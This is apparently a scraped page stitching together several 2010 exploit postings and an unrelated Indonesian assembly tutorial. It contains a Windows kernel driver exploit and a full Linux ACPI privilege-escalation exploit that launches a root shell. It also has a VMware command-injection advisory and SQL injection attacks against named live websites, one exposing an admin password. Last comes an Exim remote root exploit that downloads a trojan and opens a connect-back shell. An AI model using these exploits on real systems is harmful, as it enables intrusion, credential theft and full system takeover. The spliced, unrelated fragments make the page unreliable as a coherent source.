HANDLE hthread = OpenThread(THREAD_ALL_ACCESS , FALSE , GetCurrentThreadId());
PSYSTEM_HANDLE_INFORMATION phi = (PSYSTEM_HANDLE_INFORMATION)GetInfoTable(SystemHandleInformation);
PSYSTEM_MODULE_INFORMATION pmi = (PSYSTEM_MODULE_INFORMATION)GetInfoTable(SystemModuleInformation);
//get base address of vrsecos.sys
PVOID vrsecosbase = 0 ;
ULONG i ;
for (i = 0 ; i < pmi->Count ; i ++)
{
if (stricmp((PCHAR)(pmi->Module[i].ImageName + strlen(pmi->Module[i].ImageName ) - strlen("vrsecos.sys")) ,
"vrsecos.sys") == 0 )
{
vrsecosbase = pmi->Module[i].Base;
break ;
}
}
if (vrsecosbase == 0 )
{
printf("cannot find vrsecos....\n");
//return 0 ;
}
if (!InbvInit(pmi->Module[0].Base , strrchr(pmi->Module[0].ImageName , '\\')+1))
{
printf("cannot init inbv system\n");
return 0 ;
}
//get thread object
PVOID MyThreadOBJ = NULL ;
for (i = 0 ; i < phi->NumberOfHandles ; i ++)
{
if (phi->Information[i].HandleValue == (USHORT)hthread &&
phi->Information[i].UniqueProcessId == (USHORT)GetCurrentProcessId())
{
MyThreadOBJ = phi->Information[i].Object;
break ;
}
}
if (MyThreadOBJ == NULL)
{
printf("cannot find my thread object\n");
return 0 ;
}
//for KeWaitForSignleObject
//KeWaitForSignleObject will check SignalState
pmutant->Header.SignalState = 0x30303030;
pmutant->MutantListEntry.Flink = (PLIST_ENTRY)((ULONG)vrsecosbase + 0x2db0 );
pmutant->MutantListEntry.Blink = (PLIST_ENTRY)((ULONG)vrsecosbase + 0x2db0) ;
//for KeReleaseMutex , Mutant 's owner thread must be our thread when KeReleaseMutex
pmutant->OwnerThread = MyThreadOBJ;
//for IOCTL CODE 0x83072014
//spec NPAGED_LOOKASIDE_LIST List
//
// user address space
PVOID pAlloc = VirtualAlloc((PVOID)0x0A0A0A0A , 0x1000 , MEM_RESERVE|MEM_COMMIT , PAGE_READWRITE);
if (pAlloc == NULL)
{
printf("cannot allocate spec addr %u\n! ", GetLastError());
return 0 ;
}
*(DWORD*)0x0a0a0101 = 0 ;
// vrsecos+2d68 < vrsecos+2d64
// and vrsecos+2d68 < 0
*(DWORD*)((ULONG)pdata + 0x81c +200) = 0xc1c1c1c1 ;
*(DWORD*)((ULONG)pdata + 0x820 + 200) = 0xc0c0c0c0 ;
//fill NPAGED_LOOKASIDE_LIST
*(DWORD*)((ULONG)pdata + 0xdd8 + 200) = 0x0a0a0101;
*(DWORD*)((ULONG)pdata + 0xddc +200 ) = 0x01010101 ;
//fill NPAGE_LOOKASIDE_LIST->AllocateRoutine
//is our R0 Shell Code !!!
*(DWORD*)((ULONG)pdata + 0xdd8 + 0x28 +200 ) = (DWORD)InbvShellCode;
ULONG btr ;
ULONG temp;
//memory overflow!!
if (!DeviceIoControl(hDev , 0x8307202c , pdata , 0x1000 , NULL , 0 , &btr , NULL ))
{
printf("dev ctl 1 failed %u\n", GetLastError());
return 0 ;
}
PVOID pdata2 = malloc(0x6d4);
*(DWORD*)pdata2 = 1;
*(ULONG*)((ULONG)pdata2 + 8 ) = 0 ;
strcpy((PCHAR)((ULONG)pdata2 + 264) , "exploit you !");
strcpy((PCHAR)((ULONG)pdata2 + 464) , "exploit you !!");
//first time , NPAGED_LOOKASIDE_LIST got ZERO !!
if (!DeviceIoControl(hDev , 0x83072014 , pdata2 , 1748 , &temp , 4 , &btr , 0 ))
{
printf("dev ctrl 2 failed %u\n", GetLastError());
return 0 ;
}
//second time , go NPAGED_LOOKASIDE_LIST->AllocateRoutine!!
if (!DeviceIoControl(hDev , 0x83072014 , pdata2 , 1748 , &temp , 4 , &btr , 0 ))
{
printf("dev ctrl 2 failed %u\n", GetLastError());
return 0 ;
}
return 0 ;
}
# oz return========================================
VMware Tools update OS Command Injection
========================================
1. Advisory Information
Advisory ID: BONSAI-2010-0110
Date published: Thu Dec 9, 2010
Vendors contacted: VMware
Release mode: Coordinated release
2. Vulnerability Information
Class: Injection
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2010-4297
3. Software Description
VMware Tools is a suite of utilities that enhances the performance of
the virtual machine's guest operating system and improves management of
the virtual machine. Without VMware Tools installed in your guest
operating system, guest performance lacks important functionality.
Installing VMware Tools eliminates or improves the following issues:
* low video resolution
* inadequate color depth
* incorrect display of network speed
* restricted movement of the mouse
* inability to copy and paste and drag-and-drop files
* missing sound
VMware Tools includes these components:
* VMware Tools service
* VMware device drivers
* VMware user process
* VMware Tools control panel
VMware Tools is provided in the following formats:
* ISOs (contain .tar and .rpm files) – packaged with the product and
are installed in a number of ways, depending upon the VMware product and
the guest operating system installed in the virtual machine. VMware
Tools provides a different ISO file for each type of supported guest
operating system: Windows, Linux, NetWare, Solaris, and FreeBSD.
* Operating System Specific Packages (OSPs) – downloaded and
installed from the command line. VMware Tools is available as separate
downloadable, light-weight packages that are specific to each supported
Linux operating system and VMware product. OSPs are an alternative to
the existing mechanism for installing VMware Tools and only support
Linux systems running on ESX.
4. Vulnerability Description
Injection flaws, such as SQL, OS, and LDAP injection, occur when
untrusted data is sent to an interpreter as part of a command or query.
The attacker’s hostile data can trick the interpreter into executing
unintended commands or accessing unauthorized data.
5. Vulnerable packages
Column 4 of the following table lists the action required to remediate
the vulnerability in each release, if a solution is available:
VMWare Product Product Version Running On Replace with / Apply Patch
VirtualCenter any Windows not affected
Workstation 7.X any 7.1.2 Build 301548 or later
Workstation 6.5.X any 6.5.5 Build 328052 or later
Player 3.1.X any 3.1.2 Build 301548 or later
Player 2.5.X any 2.5.5 Build 328052 or later
AMS any any not affected
Server 2.0.2 any affected, no patch planned
Fusion 3.1.X Mac OSX 3.1.2 Build 332101
Fusion 2.X Mac OSX 2.0.8 Build 328035
ESXi 4.1 ESXi ESXi410-201010402-BG
ESXi 4.0 ESXi ESXi400-201009402-BG
ESXi 3.5 ESXi ESXe350-201008402-T-BG **
ESX 4.1 ESX ESX410-201010405-BG
ESX 4.0 ESX ESX400-201009401-SG
ESX 3.5 ESX ESX350-201008409-BG **
ESX 3.0.3 ESX not affected
* hosted products are VMware Workstation, Player, ACE, Fusion.
** Non Windows-based guest systems on ESXi 3.5 and ESX 3.5 only:
- Install the relevant ESX patch.
- Manually upgrade tools in the virtual machine (virtual machine
users will not be prompted to upgrade tools). Note the VI Client may
not show that the VMware tools is out of date in th summary tab.
Full VMWare advisory could be found at:
http://www.vmware.com/security/advisories/VMSA-2010-0018.html
6. Non-vulnerable packages
See above table.
7. Credits
This vulnerability was discovered by Nahuel Grisolia ( nahuel -at-
bonsai-sec.com ).
8. Technical Description
8.1. OS Command Injection – PoC Example
CVSSv2 Score: 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C)
VMware Server Infrastructure Web Access is prone to remote command
execution vulnerability because the software fails to adequately
sanitize user-supplied input.
When Updating the VMTools on a certain Guest Virtual Machine, a command
injection attack can be executed if specially crafted parameters are sent.
Successful attacks can compromise the affected Guest Virtual Machine
with root privileges.
The following proof of concept is given. It was exploited in a GNU/Linux
Guest with VMware Tools installed but not fully updated:
POST /ui/sb HTTP/1.1
[…]
Cookie: JSESSIONID=F78CCA7DD3CF4E2E82587B236660C9ED; user_name=vmuser;
l=http%3A%2F%2Flocalhost%3A80%2Fsdk
[…]
[{i:"378",exec:"/cmd/vm",args:["UpgradeTools_Task",{_i:"VirtualMachine|960"},";
INJECTED COMMAND HERE ;"]}]
9. Report Timeline
• 2010-04-24 / Vulnerabilities were identified
• 2010-04-29 – 2010-12-02 / Multiple Contacts with Vendor
• 2010-12-09 / Vulnerability is Disclosed – PoC attached
10. About Bonsai
Bonsai is a company involved in providing professional computer
information security services. Currently a sound growth company, since
its foundation in early 2009 in Buenos Aires, Argentina, we are fully
committed to quality service and focused on our customers’ real needs.
11. Disclaimer
The contents of this advisory are copyright (c) 2010 Bonsai Information
Security, and may be distributed freely provided that no fee is charged
for this distribution and proper credit is given.
# oz website======================================================
UltraVintage <= Remote Multiple SQL Injection Exploits
======================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
3 3
3 _ __ __ ________ __ __ 3
7 /' \ /'__`\ /'__`\ /\_____ \ /\ \/\ \ 7
1 /\_, \/\_\L\ \ /\_\L\ \\/___//'/' \_\ \ \ \____ 1
3 \/_/\ \/_/_\_<_\/_/_\_<_ /' /' /'_` \ \ '__`\ 3
3 \ \ \/\ \L\ \ /\ \L\ \ /' /' /\ \L\ \ \ \L\ \ 3
7 \ \_\ \____/ \ \____//\_/ \ \___,_\ \_,__/ 7
1 \/_/\/___/ \/___/ \// \/__,_ /\/___/ 1
3 >> Exploit database separated by exploit 3
3 type (local, remote, DoS, etc.) 3
7 7
1 [+] Site : 1337db.com 1
3 [+] Support e-mail : submit[at]1337db.com 3
3 3
7 ############################################ 7
1 I'm KnocKout 1337 Member from 1337 DataBase 1
3 ############################################ 3
3 3
7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[~] HomePage : http://h4x0resec.blogspot.com
[~] Reference : http://h4x0resec.blogspot.com
[~] Special Thanks : DaiMon,BARCOD3 and H4X0RE SECURITY
##############################################################
exploit(lamer)-DB.com FUCK YOUR N00B LAMERS!!!
Kralınız gelsin. mua:) siksqlZkırev..
############################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : UltraVintage
|~Price : N/A
|~Version : N/A
|~Software: http://www.ultravintage.com/
|~Vulnerability Style : SQL Injection & based
|~Vulnerability Dir : /
|~sqL : MysqL
|~Google Keyword : "Powered by UltraVintage"
|[~]Date : "19.12.2010"
|[~]Tested on : (L):Vista (R):Apache/2.2.3 (CentOS) PHP/5.2.6 MYSQL DEMOS
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Demos:
http://www.pioneerhi-bred.gr/
http://www.cottonbest.eu
http://www.fcfantasy.com
http://www.sunrisepv.gr
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============================================================
|{~~~~~~~~ Explotation| main.php SQL Injection~~~~~~~~~~~}|
http://$localhost/$path/details.php?id=1 { SQL Injection}
Ex; http://www.pioneerhi-bred.gr
[~] SQL Injecting
http://www.pioneerhi-bred.gr/main.php?id=1%20union%20select%201,concat%28loginname,0x3a,password%29,3,4,5%20from%20phplist_admin
[~] MySQL Writes : admin:pioneerhibred!23
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POC Exploit
<html>
<body>
<form
action="http://www.pioneerhi-bred.gr/main.php?id=1%20union%20select%201,concat%28loginname,0x3a,password%29,3,4,5%20from%20phplist_admin"
method="POST">
<input type="submit" name="kieli" value="Click and SQL Injection for click Enter">
</form>
</body>
</html>
#######################################################################
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============================================================
|{~~~~~~~~ Explotation| main.php Based SQL Injection~~~~~~~~~~~}|
http://$localhost/$path/details.php?id=1 {BASED SQL INJECTION}
Ex; http://www.sunrisepv.gr
[~]SQL Injecting..
http://www.sunrisepv.gr/main.php?id=1%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1
[~]Mysql Writes : Duplicate entry '~'sunris___uvdb'~1' for key 1
[+]Database OK: 'sunris___uvdb'
#######################################################################
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
POC Exploit
<html>
<body>
<form
action="http://www.sunrisepv.gr/main.php?id=1%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20concat%280x7e,0x27,unhex%28hex%28database%28%29%29%29,0x27,0x7e%29%29%20from%20information_schema.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20and%201=1"
method="POST">
<input type="submit" name="kieli" value="Click and SQL Injection for click Enter">
</form>
</body>
</html>
# still on oz ok !=================================================================
Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation
=================================================================
/*
* american-sign-language.c
*
* Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4347
*
* This custom_method file allows to inject custom ACPI methods into the ACPI
* interpreter tables. This control file was introduced with world writeable
* permissions in Linux Kernel 2.6.33.
*
* Usage:
*
* $ gcc american-sign-language.c -o american-sign-language
* $ ./american-sign-language
* [+] resolving required symbols...
* [+] checking for world-writable custom_method...
* [+] checking for an ACPI LID device...
* [+] poisoning ACPI tables via custom_method...
* [+] triggering ACPI payload via LID device...
* [+] triggering exploit via futimesat...
* [+] launching root shell!
* # id
* uid=0(root) gid=0(root) groups=0(root)
*
* Notes:
*
* This vuln allows us to write custom ACPI methods and load them into the
* kernel as an unprivileged user. We compile some fancy ASL down to AML
* that overrides the ACPI method used when the status of the LID device is
* queried (eg. 'open' or 'closed' lid on a laptop). When the method is
* triggered, it overlays an OperationRegion on the physical address where
* sys_futimesat is located and overwrites the memory via the Store to
* escalate privileges whenever sys_futimesat is called.
*
* The payload is 64-bit only and depends on the existence of a LID device
* (eg. laptop), but the exploit will still tell you if you're vulnerable
* regardless. If you don't know how to work around these limitations, you
* probably shouldn't be running this in the first place. :-P
*
* Props to taviso, spender, kees, bliss, pipacs, twiz, stealth, and #brownpants
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <inttypes.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/utsname.h>
/*
* The ASL payload looks like:
*
* DefinitionBlock ("lid.aml", "SSDT", 2, "", "", 0x00001001) {
* Method (\_SB.LID._LID, 0, NotSerialized) {
* OperationRegion (KMEM, SystemMemory, PHYADDR, 0x392)
* Field(KMEM, AnyAcc, NoLock, Preserve) {
* HACK, 0x392
* }
* Store (Buffer () {
* 0x55, 0x48, 0x89, 0xe5, 0x53, 0x48, 0x83, 0xec,
* 0x08, 0x48, 0xc7, 0xc3, 0x24, 0x24, 0x24, 0x24,
* 0x48, 0xc7, 0xc0, 0x24, 0x24, 0x24, 0x24, 0xbf,
* 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x48, 0x89,
* 0xc7, 0xff, 0xd3, 0x48, 0xc7, 0xc0, 0xb7, 0xff,
* 0xff, 0xff, 0x48, 0x83, 0xc4, 0x08, 0x5b, 0xc9,
* 0xc3 }, HACK)
* Return (One)
* }
* }
*
* Feel free to `iasl -d` this is you don't trust me! ;-)
*/
#define PAYLOAD_AML \
"\x53\x53\x44\x54\x90\x00\x00\x00\x02\x3e\x00\x00\x00\x00\x00\x00" \
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x00\x00\x49\x4e\x54\x4c" \
"\x21\x05\x09\x20\x14\x4b\x06\x5c\x2f\x03\x5f\x53\x42\x5f\x4c\x49" \
"\x44\x5f\x5f\x4c\x49\x44\x00\x5b\x80\x4b\x4d\x45\x4d\x00\x0c\xe0" \
"\x61\x17\x01\x0b\x92\x03\x5b\x81\x0c\x4b\x4d\x45\x4d\x00\x48\x41" \
"\x43\x4b\x42\x39\x70\x11\x34\x0a\x31\x55\x48\x89\xe5\x53\x48\x83" \
"\xec\x08\x48\xc7\xc3\x24\x24\x24\x24\x48\xc7\xc0\x24\x24\x24\x24" \
"\xbf\x00\x00\x00\x00\xff\xd0\x48\x89\xc7\xff\xd3\x48\xc7\xc0\xb7" \
"\xff\xff\xff\x48\x83\xc4\x08\x5b\xc9\xc3\x48\x41\x43\x4b\xa4\x01"
#define PAYLOAD_LEN 144
#define CUSTOM_METHOD "/sys/kernel/debug/acpi/custom_method"
#define HEY_ITS_A_LID "/proc/acpi/button/lid/LID/state"
unsigned long
get_symbol(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[512];
struct utsname ver;
int ret;
int rep = 0;
int oldstyle = 0;
f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
f = fopen("/proc/ksyms", "r");
if (f == NULL)
goto fallback;
oldstyle = 1;
}
repeat:
ret = 0;
while(ret != EOF) {
if (!oldstyle)
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
else {
ret = fscanf(f, "%p %s\n", (void **)&addr, sname);
if (ret == 2) {
char *p;
if (strstr(sname, "_O/") || strstr(sname, "_S."))
continue;
p = strrchr(sname, '_');
if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {
p = p - 4;
while (p > (char *)sname && *(p - 1) == '_')
p--;
*p = '\0';
}
}
}
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fclose(f);
return addr;
}
}
fclose(f);
if (rep)
return 0;
fallback:
uname(&ver);
if (strncmp(ver.release, "2.6", 3))
oldstyle = 1;
sprintf(sname, "/boot/System.map-%s", ver.release);
f = fopen(sname, "r");
if (f == NULL)
return 0;
rep = 1;
goto repeat;
}
int
main(int argc, char **argv)
{
int ret;
FILE *fp;
char buf[64];
struct stat sb;
char payload[PAYLOAD_LEN] = PAYLOAD_AML;
unsigned long sys_futimesat, prepare_kernel_cred, commit_creds;
printf("[+] resolving required symbols...\n");
sys_futimesat = get_symbol("sys_futimesat");
if (!sys_futimesat) {
printf("[-] sys_futimesat symbol not found, aborting!\n");
exit(1);
}
prepare_kernel_cred = get_symbol("prepare_kernel_cred");
if (!prepare_kernel_cred) {
printf("[-] prepare_kernel_cred symbol not found, aborting!\n");
exit(1);
}
commit_creds = get_symbol("commit_creds");
if (!commit_creds) {
printf("[-] commit_creds symbol not found, aborting!\n");
exit(1);
}
printf("[+] checking for world-writable custom_method...\n");
ret = stat(CUSTOM_METHOD, &sb);
if (ret < 0) {
printf("[-] custom_method not found, kernel is not vulnerable!\n");
exit(1);
}
if (!(sb.st_mode & S_IWOTH)) {
printf("[-] custom_method not world-writable, kernel is not vulnerable!\n");
exit(1);
}
printf("[+] checking for an ACPI LID device...\n");
ret = stat(HEY_ITS_A_LID, &sb);
if (ret < 0) {
printf("[-] ACPI LID device not found, but kernel is still vulnerable!\n");
exit(1);
}
if (sizeof(sys_futimesat) != 8) {
printf("[-] payload is 64-bit only, but kernel is still vulnerable!\n");
exit(1);
}
sys_futimesat &= ~0xffffffff80000000;
memcpy(&payload[63], &sys_futimesat, 4);
memcpy(&payload[101], &commit_creds, 4);
memcpy(&payload[108], &prepare_kernel_cred, 4);
printf("[+] poisoning ACPI tables via custom_method...\n");
fp = fopen(CUSTOM_METHOD, "w");
fwrite(payload, 1, sizeof(payload), fp);
fclose(fp);
printf("[+] triggering ACPI payload via LID device...\n");
fp = fopen(HEY_ITS_A_LID, "r");
fread(&buf, 1, sizeof(buf), fp);
fclose(fp);
printf("[+] triggering exploit via futimesat...\n");
ret = futimesat(0, "/tmp", NULL);
if (ret != -1 || errno != EDOTDOT) {
printf("[-] unexpected futimesat errno, exploit failed!\n");
exit(1);
}
if (getuid() != 0) {
printf("[-] privileges not escalated, exploit failed!\n");
exit(1);
}
printf("[+] launching root shell!\n");
execl("/bin/sh", "/bin/sh", NULL);
}# o2nri2.co.tv [oz]======================== Exim 4.63 Remote Exploit ======================== #Exim 4.63 (RedHat/Centos/Debian) Remote Root Exploit by Kingcope #Modified perl version of metasploit module =for comment use this connect back shell as "trojanurl" and be sure to setup a netcat, ---snip--- $system = '/bin/sh'; $ARGC=@ARGV; if ($ARGC!=2) { print "Usage: $0 [Host] [Port] \n\n"; die "Ex: $0 127.0.0.1 2121 \n"; } use Socket; use FileHandle; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; SOCKET->autoflush(); open(STDIN, ">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET"); open FILE, ">/var/spool/exim4/s.c"; print FILE qq{ #include <stdio.h> #include <unistd.h> int main(int argc, char *argv[]) { setuid(0); setgid(0); setgroups(0, NULL); execl("/bin/sh", "sh", NULL); } }; close FILE; system("gcc /var/spool/exim4/s.c -o /var/spool/exim4/s; rm /var/spool/exim4/s.c"); open FILE, ">/tmp/e.conf"; print FILE "spool_directory = \${run{/bin/chown root:root /var/spool/exim4/s}}\${run{/bin/chmod 4755 /var/spool/exim4/s}}"; close FILE; system("exim -C/tmp/e.conf -q; rm /tmp/e.conf"); system("uname -a;"); system("/var/spool/exim4/s"); system($system); ---snip--- =cut use IO::Socket; if ($#ARGV ne 3) { print "./eximxpl <host/ip> <trojanurl> <yourip> <yourport>\n"; print "example: ./eximxpl utoronto.edu http://www.h4x.net/shell.txt 3.1.33.7 443\n"; exit; } $|=1; $trojan = $ARGV[1]; $myip = $ARGV[2]; $myport = $ARGV[3]; $helohost = "abcde.com"; $max_msg = 52428800; my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "25", Proto => 'tcp'); while(<$sock>) { print; if ($_ =~ /220 /) { last;} } print $sock "EHLO $helohost\r\n"; while(<$sock>) { print; if ($_ =~ /250-SIZE (\d+)/) { $max_msg = $1; print "Set size to $max_msg !\n"; } if ($_ =~ /^250.*Hello ([^\s]+) \[([^\]]+)\]/) { $revdns = $1; $saddr = $2; } if ($_ =~ /250 /) { last;} } if ($revdns eq $helohost) { $vv = ""; } else { $vv = $revdns. " "; } $vv .= "(" . $helohost . ")"; $from = "root\@local.com"; $to = "postmaster\@localhost"; $msg_len = $max_msg + 1024*256; $logbuffer_size = 8192; $logbuffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <$from> H=$vv [$saddr]: message too big: read=$msg_len max=$max_msg\n"; $logbuffer .= "Envelope-from: <$from>\nEnvelope-to: <$to>\n"; $filler = "V" x (8 * 16); $logbuffer_size -= 3; for ($k=0;$k<60;$k++) { if (length($logbuffer) >= $logbuffer_size) {last;} $hdr = sprintf("Header%04d: %s\n", $k, $filler); $newlen = length($logbuffer) + length($hdr); if ($newlen > $logbuffer_size) { $newlen -= $logbuffer_size; $off = length($hdr) - $newlen - 2 - 1; $hdr = substr($hdr, 0, $off); $hdr .= "\n"; } $hdrs .= $hdr; $logbuffer .= " " . $hdr; } $hdrx = "HeaderX: "; $k2 = 3; for ($k=1;$k<=200;$k++) { if ($k2 > 12) { $k2 = 3; } # $hdrx .= "\${run{/bin/sh -c 'exec /bin/sh -i <&$k2 >&0 2>&0'}} "; $hdrx .= "\${run{/bin/sh -c \"exec /bin/sh -c 'wget $trojan -O /tmp/c.pl;perl /tmp/c.pl $myip $myport; sleep 10000000'\"}} "; $k2++; } $v = "A" x 255 . "\n"; $body = ""; while (length($body) < $msg_len) { $body .= $v; } $body = substr($body, 0, $msg_len); print $sock "MAIL FROM: <$from>\r\n"; $v = <$sock>; print $v; print $sock "RCPT TO: <$to>\r\n"; $v = <$sock>; print $v; print $sock "DATA\r\n"; $v = <$sock>; print $v; print "Sending large buffer, please wait...\n"; print $sock $hdrs; print $sock $hdrx . "\n"; print $sock $body; print $sock "\r\n.\r\n"; $v = <$sock>; print $v; print $sock "MAIL FROM: <$from>\r\n"; $v = <$sock>; print $v; print $sock "RCPT TO: <$to>\r\n"; while(1){}; # 1337db.com [2010-12-11]
Bagi seseorang yang bergelut di dunia security bahasa Assembly adalah bahasa yang wajib dikuasai. Karena bahasa ini adalah bahasa tingkat rendah, dekat dengan bahasa mesin (biner), maka mempelajari bahasa ini akan sangat menguntungkan. Dengan mempelajari bahasa assembly, sedikit banyak secara otomatis kita akan memahami cara komputer bekerja lebih dalam lagi.
Artikel ini juga sebagai pembuka sebelum saya membahas mengenai shellcode, buffer overflow dan teknik exploitasi lain yang membutuhkan pemahaman mengenai assembly dan sistem operasi. Bila anda ingin menjadi hacker yang baik, anda wajib menguasai bahasa ini.
Bahasa Mesin, Assembly dan C
Pada dasarnya komputer adalah makhluk digital yang hanya mengerti digit 1 dan digit 0 (binary). Komputer hanya mau menerima data dalam bentuk binary dan juga hanya bisa mengerti perintah dalam bentuk binary. Perintah dalam bentuk binary ini disebut dengan bahasa mesin.
Secara umum program bisa dilihat sebagai urutan langkah/perintah/instruksi untuk menyelesaikan sesuatu. Programmer bisa langsung membuat program dengan menuliskan perintah dalam bentuk 1 dan 0 (bahasa mesin), atau menggunakan bahasa tingkat tinggi yang lebih manusiawi seperti C, Visual Basic atau Java.
Hanya dua simbol yang dimengerti komputer, yaitu 1 dan 0
Perhatikan contoh sederhana ini: programmer ingin menyimpan nilai register EAX ke dalam stack. Dalam bahasa mesin programmer harus menuliskan 01010000. Sedangkan dalam bahasa assembly programmer cukup menulis PUSH EAX. Manakah yang lebih manusiawi? Tentu menggunakan assembly lebih manusiawi. Sangat sulit bagi manusia bila harus selalu menggunakan 1 dan 0 setiap memberi perintah.
Semakin tinggi bahasanya, maka semakin manusiawi cara memberi perintahnya. Contohnya bila programmer ingin menampilkan suatu teks di layar monitor, dalam bahasa C programmer cukup menuliskan printf(“Hello World”), mudah dan singkat. Namun dalam bahasa yang lebih rendah seperti assembly, dibutuhkan sekitar 5 langkah untuk menyelesaikan tugas yang sama.
Semua program dalam bahasa apapun dibuatnya, pada akhirnya ketika akan dieksekusi akan diterjemahkan dalam bahasa mesin, karena itulah satu-satunya bahasa yang dimengerti prosesor.
Bahasa Assembly dan Processor
Karena bahasa assembly adalah mnemonic (singkatan) untuk instruksi dalam bahasa mesin. Maka perintah-perintah dalam bahasa assembly terkait erat dengan prosesornya. Setiap prosesor memiliki instruction set masing-masing,sehingga bahasa assembly untuk prosesor Intel akan berbeda dengan assembly untuk prosesor lainnya. Namun karena intel menguasai pangsa pasar prosesor maka hampir semua produsen prosesor membuat instruksi set yang kompatibel dengan intel.
Bahasa assembly adalah mnemonic dari instruksi bahasa mesin (berbentuk binary) yang disebut opcode
Dokumentasi lengkap mengenai membuat program dalam prosesor intel, termasuk daftar instruction setnya bisa diperoleh di website resmi intel, di intel developer manuals. Dalam artikel ini saya hanya menjelaskan beberapa instruksi dasar yang paling banyak dipakai, selebihnya bisa dilihat di manual yang ada di website intel.
Assembly AT&T dan NASM
Ada dua sintaks bahasa assembly, yaitu dalam format AT&T dan NASM. Sintaks AT&T banyak dipakai dalam lingkungan GNU seperti GNU Assembler, dan menjadi format default GNU Debugger (GDB). Sedangkan format NASM dipakai oleh netwide assembler dan banyak dipakai di lingkungan windows.
Perlu dicatat bahwa perbedaan NASM dan AT&T ini hanya masalah sintaks saja, keduanya menghasilkan bahasa mesin yang sama persis
Beberapa perbedaan antara format AT&T dan NASM adalah:
- Baris komentar diawali dengan “;” semicolon untuk NASM. AT&T mengawali komentar dengan # (hash)
- Dalam format AT&T, setiap register diawali dengan %. NASM tidak menggunakan %.
- Dalam format AT&T, setiap nilai literal (konstanta) diawali dengan $. NASM tidak menggunakan $.
- Pada perintah yang menggunakan operand sumber dan tujuan, format AT&T menuliskan tujuan sebagai operand kedua (contoh: CMD <source>,<dest>). Sedangkan NASM menuliskan tujuan sebagai operand pertama (contoh: CMD <dest>,<source>).
Register
Register adalah variabel internal yang sudah built-in di dalam prosesor yang bisa dipakai oleh programmer untuk bermacam-macam keperluan. Karena register posisinya di prosesor, bukan di memory, maka menggunakan register sebagai variabel jauh lebih cepat dibanding menggunakan variabel yang dismipan di suatu alamat di memori.
Berikut adalah jenis-jenis register yang ada pada prosesor Intel.
| Kategori | Nama | Penjelasan |
|---|---|---|
| General Purpose | EAX, EBX, ECX, EDX | Lebar data 32 bit, boleh diapakai untuk keperluan apa saja. E adalah Extended (karena awalnya register general purpose hanya 16 bit). |
| AX,BX,CX,DX | 16 bit bawah dari register 32 bit di atas. AX adalah bagian 16 bit bawah dari EAX. | |
| AH,AL,BH,BL,CH,CL,DH,DL | Bagian 8 bit dari register 16 bit di atas . AH adalah 8 bit atas dari AX. AL adalah 8 bit bawah dari AX. | |
| Segment Register | CS, SS, DS, ES, FS, GS | Digunakan untuk menunjuk 16 bit awal alamat memori. CS = Code, SS = Stack, DS = Data, ES,FS,GS = Extra segment register |
| Offset Register | Digunakan untuk menunjuk 16 bit akhir alamat memori. Alamat memori ditunjukkan dengan gabungan segment dan offset. | |
| EBP | Dipakai sebagai offset frame dalam stack. Biasanya menunjuk pada bottom of stack frame di suatu fungsi. ESP menunjukkan puncak stack, EBP menunjuk dasar stack. | |
| ESI | Biasanya dipakai untuk offset string sumber dalam operasi yang melibatkan blok memori. | |
| EDI | Biasanya dipakai untuk offset string tujuan dalam operasi yang melibatkan blok memori. | |
| ESP | Stack pointer, menunjukkan puncak dari stack. | |
| Special | EFLAGS | Tidak bisa dipakai programmer, hanya dipakai prosesor untuk hasil operasi logical dan state. |
